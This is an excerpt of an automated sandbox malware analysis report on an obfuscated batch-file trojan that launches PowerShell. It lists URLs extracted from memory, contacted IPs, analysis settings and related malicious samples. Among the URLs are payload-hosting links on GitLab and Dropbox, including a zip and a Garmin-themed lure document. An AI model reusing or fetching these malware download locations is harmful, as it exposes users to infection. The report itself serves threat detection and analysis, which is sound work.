                                      https://paper.dropbox.com/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.hellofax.com/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://pal-test.adyen.compowershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.dropbox.compowershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://paper.dropbox.com/cloud-docs/editpowershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/Licensepowershell.exe, 0000000E.00000002.2511811483.0000018757818000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://snowplow.trx.gitlab.netpowershell.exe, 0000000E.00000002.2464009418.0000018748C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://app.hellosign.com/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://collector.prd-278964.gl-product-analytics.compowershell.exe, 0000000E.00000002.2464009418.0000018748C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.hellosign.com/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://gitlab.com/fgh8090051/jgh/-/raw/main/fga1812.zippowershell.exe, 0000000E.00000002.2520913023.000001875F7F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://instructorledlearning.dropboxbusiness.com/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.dropbox.com/page_success/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://gitlab.compowershell.exe, 0000000E.00000002.2464009418.0000018748293000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.dropbox.com/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.dropbox.com/pithos/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://sales.dropboxbusiness.com/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://photos.dropbox.com/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://a.sprig.com/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.docsend.com/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.dropbox.com/encrypted_folder_download/service_worker.jspowershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://gitlab.com/assets/powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_envpowershell.exe, 0000000E.00000002.2464009418.0000018748C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://navi.dropbox.jp/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://contoso.com/powershell.exe, 0000000E.00000002.2511811483.0000018757818000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.1364904117.00000197325E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723ACE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1364904117.00000197324A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2511811483.00000187576D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2511811483.0000018757818000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.dopowershell.exe, 0000000C.00000002.1349620298.000001972079E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019722662000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1367991489.000001973A613000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350076197.0000019720940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.dropbox.com/static/api/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://edge-block-www-env.dropbox-dns.compowershell.exe, 0000000C.00000002.1350168828.0000019723A9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.dropboxstatic.com/static/powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://apis.google.compowershell.exe, 0000000E.00000002.2464009418.0000018748C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://officeapps-df.live.compowershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://api.login.yahoo.com/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.1350168828.0000019722431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018747661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2536294370.00000256573BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://sentry.gitlab.netpowershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://login.yahoo.com/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://docsend.com/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://uce7538052cd98e23dd4ab202b67.dl.dropboxusercontent.com/cd/0/get/CghgEBbI7BWE-ZfTAruPVm3dHgMTpowershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://www.dropbox.com/playlist/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.recaptcha.net/powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://onedrive.live.com/pickerpowershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.1364904117.00000197325E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723ACE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1364904117.00000197324A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.00000187490CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2511811483.00000187576D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2511811483.0000018757818000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://showcase.dropbox.com/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.dropbox.com/static/serviceworker/powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.dropbox.compowershell.exe, 0000000C.00000002.1350168828.0000019723062000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.2464009418.0000018747893000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.2464009418.0000018747893000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://go.micropowershell.exe, 0000000C.00000002.1350168828.0000019723062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018748293000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2536294370.00000256578E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://new-sentry.gitlab.netpowershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://uce7538052cd98e23dd4ab202b67.dl.dropboxusercontent.compowershell.exe, 0000000C.00000002.1350168828.0000019723A9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://contoso.com/Iconpowershell.exe, 0000000E.00000002.2511811483.0000018757818000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.dropbox.com/v/s/playlist/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://www-env.dropbox-dns.compowershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.2464009418.0000018747893000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://uce7538052cd98e23dd4ab202b67.dl.dropboxusercontent.compowershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://docs.sandbox.google.com/document/fsip/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://docs.sandbox.google.com/spreadsheets/fsip/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/garmin_campaign_information_for_partners_v11.dopowershell.exe, 0000000C.00000002.1369108486.000001973A730000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://docs.google.com/document/fsip/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://help.dropbox.com/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://docs.google.com/presentation/fsip/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://canny.io/sdk.jspowershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://gitlab.com/-/sandbox/powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://gitlab.com/admin/powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://customers.gitlab.compowershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://gitlab.com/-/speedscope/index.htmlpowershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://selfguidedlearning.dropboxbusiness.com/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.google.com/recaptcha/powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://sourcegraph.compowershell.exe, 0000000E.00000002.2464009418.0000018748C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018748CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://aka.ms/pscore68powershell.exe, 0000000C.00000002.1350168828.0000019722431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2464009418.0000018747661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2536294370.0000025657343000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2536294370.000002565737F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://docs.sandbox.google.com/presentation/fsip/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://dl-web.dropbox.com/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://app.hellofax.com/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://cfl.dropboxstatic.com/static/powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.paypal.com/sdk/jspowershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://docs.google.com/spreadsheets/fsip/powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.dropbox.com/csp_log?policy_name=metaserver-whitelistpowershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                            172.65.251.78
                                                                                                                                                                                            gitlab.comUnited States
                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                            162.125.69.18
                                                                                                                                                                                            www-env.dropbox-dns.comUnited States
                                                                                                                                                                                            19679DROPBOXUSfalse
                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                            Analysis ID:1578274
                                                                                                                                                                                            Start date and time:2024-12-19 14:13:13 +01:00
                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                            Overall analysis duration:0h 6m 15s
                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                            Report type:full
                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                            Number of analysed new started processes analysed:20
                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                            Technologies:
                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                            Sample name:jhsdgfjkh236.bat
                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                            Classification:mal88.troj.evad.winBAT@28/16@3/2
                                                                                                                                                                                            EGA Information:Failed
                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                            • Number of executed functions: 16
                                                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                            • Found application associated with file extension: .bat
                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.85.23.206, 13.107.246.63
                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 2220 because it is empty
                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7056 because it is empty
                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7732 because it is empty
                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                            • VT rate limit hit for: jhsdgfjkh236.bat
                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                            08:14:09API Interceptor85x Sleep call for process: powershell.exe modified
                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            172.65.251.78build_setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false
                                                                                                                                                                                            162.125.69.18kjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                              hngadsfkgj17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                hsfgdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                  gar17lksgf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                    QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                      CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                        xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                          RFQ Letter and Instructions.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                              sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
